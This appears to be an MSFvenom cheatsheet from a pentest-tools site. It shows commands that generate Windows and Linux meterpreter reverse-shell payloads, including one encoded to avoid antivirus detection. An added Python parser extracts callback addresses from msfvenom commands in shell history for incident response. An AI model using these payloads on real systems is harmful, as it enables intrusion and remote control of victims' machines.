Pentest Tools


MSFvenom Cheatsheet

How to Install MSFvenom

MSFvenom is part of the Metasploit Framework. Install Metasploit to get MSFvenom:

Installation
username@machine_name:~$ sudo apt install metasploit-framework

Useful Commands for MSFvenom


-p [payload]: Specify the payload to use
-f [format]: Specify the output format (e.g., exe, elf, raw)
-o [path]: Save the generated payload to the given file
--list-options: List all available options for the selected payload
-e [encoder]: Specify the encoder to use
-i [iterations]: Specify the number of iterations for encoding
-b [badchars]: Specify bad characters to avoid
-a [architecture]: Specify the architecture (e.g., x86, x64)
-p linux/x86/meterpreter/reverse_tcp: Generate a reverse TCP payload for Linux x86
-l payloads: List available payloads
-l encoders: List available encoders
-l formats: List available formats

Examples of MSFvenom Commands

Create a Windows reverse TCP shell payload:

Windows Payload
username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -f exe > shell.exe

Create a Linux reverse TCP shell payload:

Linux Payload
username@machine_name:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -f elf > shell.elf

Encode a payload to avoid detection:

Encode Payload
username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -e x86/shikata_ga_nai -i 10 -f exe > encoded_shell.exe

Generate a payload with specified bad characters:

Bad Characters
username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YourIP] LPORT=[YourPort] -b "\x00\x0a\x0d" -f exe > no_badchars_shell.exe

List available payloads:

List Payloads
username@machine_name:~$ msfvenom -l payloads

List available encoders:

List Encoders
username@machine_name:~$ msfvenom -l encoders
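
Seen from the incident-response side, the flags above make msfvenom command lines easy to mine: when they turn up in shell history or terminal logs on a staging host, LHOST and LPORT are the callback address and port to search for in network logs. The parser below is an added example, not part of the original cheatsheet or of Metasploit; the function names and the sample history lines are assumptions constructed for illustration.

```python
import shlex

# Single-value flags from the cheatsheet (-o is msfvenom's output-file flag).
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-e": "encoder", "-i": "iterations",
               "-b": "badchars", "-a": "arch", "-o": "out", "-l": "list"}

def parse_msfvenom(line):
    """Parse one history or terminal line; return a dict, or None if not msfvenom."""
    try:
        tokens = shlex.split(line)
    except ValueError:               # unbalanced quotes in a truncated log line
        tokens = line.split()
    # Skip a prompt, sudo or path prefix by locating the binary itself.
    idx = next((i for i, t in enumerate(tokens)
                if t.rsplit("/", 1)[-1] == "msfvenom"), None)
    if idx is None:
        return None
    rec = {"options": {}}
    args = iter(tokens[idx + 1:])
    for tok in args:
        if tok in ("|", ";", "&&", "||"):   # shell operator ends the command
            break
        if tok in VALUE_FLAGS:
            rec[VALUE_FLAGS[tok]] = next(args, None)
        elif tok == ">":                     # output redirected by the shell
            rec["out"] = next(args, None)
        elif "=" in tok and not tok.startswith("-"):
            key, _, value = tok.partition("=")   # datastore option, e.g. LHOST=...
            rec["options"][key.upper()] = value
    return rec

def callback_endpoints(lines):
    """Collect unique (LHOST, LPORT, payload) triples to pivot on in network logs."""
    seen = set()
    for line in lines:
        rec = parse_msfvenom(line)
        if rec and "LHOST" in rec["options"]:
            opts = rec["options"]
            seen.add((opts["LHOST"], opts.get("LPORT"), rec.get("payload")))
    return sorted(seen, key=str)

SAMPLE = [  # constructed history; 192.0.2.0/24 is a documentation-only range
    'username@machine_name:~$ msfvenom -p windows/meterpreter/reverse_tcp '
    'LHOST=192.0.2.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded_shell.exe',
    'msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.0.2.10 LPORT=8443 '
    '-b "\\x00\\x0a\\x0d" -f elf -o shell.elf',
    'msfvenom -l payloads', 'ls -la /tmp',
]
print(callback_endpoints(SAMPLE))
```

The encoder, iteration count and output file name in each record also help match a recovered binary to the command that produced it.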